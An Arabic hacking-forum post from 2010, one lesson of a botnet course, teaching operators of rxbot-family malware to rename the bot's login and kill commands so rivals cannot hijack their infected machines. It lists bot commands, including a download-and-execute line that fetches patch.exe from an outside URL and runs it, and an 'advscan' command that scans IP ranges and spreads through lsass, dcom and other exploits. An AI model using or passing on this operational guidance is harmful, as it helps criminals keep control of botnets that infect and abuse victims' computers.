عرض مشاركة واحدة
قديم 10-22-2010, 12:20 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Cyber Code
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي |D1|شـرح التعديل عـلى اوامر البـوت نـت للحفاظ عليه مـن السرقة|D1|





ســبحاّن الله العــظيم ســبحاّن الله وبحمده
اللهم صلي وسلم وبارك على سيدنا محمد صلى الله عليه وسلم

اللهـم اهذي المـسلمين واغفر لهـم انك انت التواب الرحـيم

اللهـم انصر المسلمين ودمـر اعدائك اعداء الدين ..

نـقدم لـكم الجزء الاول مـن الدرس الرابع من الدورة


بـعنوان

شرح التعديل على اوامر البوت للحفاظ علية من السرقة

تـــحت شعاّر فداّك يارسول الله



درس الـيوم إن شـاء الله بـيكون خـفيف وسـهل وهـام جـداً بـنفس الوقت ..

قـد يتسائل البعض مـنكم كـيف سيقـوم احد في الدخول على سرفر البوت الخاص وسرقتها ؟؟

الجـواب في كـل سهولة قد يدخل البوت جـهاز اي هـكر ويقوم في تحليل الأتصالات والبوت ليصل الى جميع المعلومات ويقوم في الدخول على الغرفة والسيطرة على البوتات ! , وذالك في استخدام امر تحميل ملف معين ومن ثم امر قتل البوتات ..

ولاكن اذا قمنا في تغير الاوامر مـن الصعب عليه سرقة البوتات وهذه الفائده

بـسم الله نـبدأ

أولاً قومو في فـتح مـلف الاوامر .. عادتاً يكون اسمه
commands.cpp أو cmd.cpp

في rxbot ومشتقاتها يكون اسم ملف الاوامر rbot.cpp

ثـم نـقوم في الـبحث عـن اهم أمرين

1- أمر الدخول للبوت

2- أمر قتل البوت

صـورة للتوضيح




مـثل ماتشاهدون هـذا هـو امر الدخول للبوت نقوم في تغيره لأي امر اخر , اهم شيء ماتنسوه .

'وهـنا نقوم في تغير امر قتل البوت "Die"



ويـمكنكم تغير كل الاوامر حتى , ولاكن يفضل تغير الاوامر المهمه فـقط



سـؤال كـيف أعرف الأوامر الافتراضيه لـتغيرها ؟؟

يـمكنك عـبر قرائة الأكواد البرمجيه أو عادتاً يأتي ملف الأوامر مرفق مـع الـبوت

عـند الانتهاء نقوم في حفظ العـمل .


شـرح لـبعض اوامر الـبوت

يعني قم في تسجيل الدخول باستخدام الباسورد 123456= login 123456

logout = تسجيل الخروج (الاوامر بعدها لن تعمل حتى يتم تسجيل الدخول للبوت)

Die = قـتل البوت .. قد يعود بعد الرستارت

download http:\\vbspiders.com\patch.exe c:\patch.exe 1 = هـذا الأمر يعني تحميل ملف من النت ووضعه على القرص C ورقم 1 يعني قم في تشغيله بعد التحميل , اذا استخدمنا رقم 0 يعني لاتقم في التشغيل

advscan lsass 100 5 999 -r

امر الأنتشار , هـذا الأمر يعني قـم في عمل سكان لثغرة lsass
5 = وقت عدم الاستجابه

100 = عدد الThreads

999 = وقت السكان

-r = عـمل سكان والأنتشار على نطاق الايبي المتصل منه البوت , ويمكن استبداله في

-b = هذا مثل ال r ولاكن هذا ياخذ نطاق اوسع واكبر للبحث

-a = وهذا مثل r ولاكن هذا ياخذ من اوسع وأكبر نطاق للبحث مثلا
192.0.0.0

-s = ويـكون بحث عادي ولاكن صامت , لايوجد اي استجابه مـن البوت



الثغرة يـمكن استبداله بأي ثغره موجوده في البوت مثلا

iis5ssl , dcom135 , dcom445 , dcom1025 , dcom2 , beagle1 , beagle2

كـل بوت وثغراته الخاصة و اوامره الخـاصة ! لاتخلط بين اوامر البوتات .

الى هـنا وينتهي درسنا اليـوم , إن شاء الله يكون خفيف وسهل وواضح

كـل ما اطلبة هـو الدعاء لي ولوالذي وأهلي ولـجميع المسلمين

فـداك روحي يارسول الله

جـميع الحـقوق مـحفوظه لـشبكة العـناكب الأحترافية

اخـوكـم
Cyber Code \ Dark Light





|D1|aJvp hgju]dg uJgn h,hlv hgfJ,j kJj ggpth/ ugdi lJk hgsvrm|D1|

الصور المرفقة
نوع الملف: jpg logon.JPG‏ (102.9 كيلوبايت, المشاهدات 649)
نوع الملف: jpg loogout.JPG‏ (94.8 كيلوبايت, المشاهدات 636)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 


التعديل الأخير تم بواسطة Cyber Code ; 11-23-2010 الساعة 05:26 AM.

   

رد مع اقتباس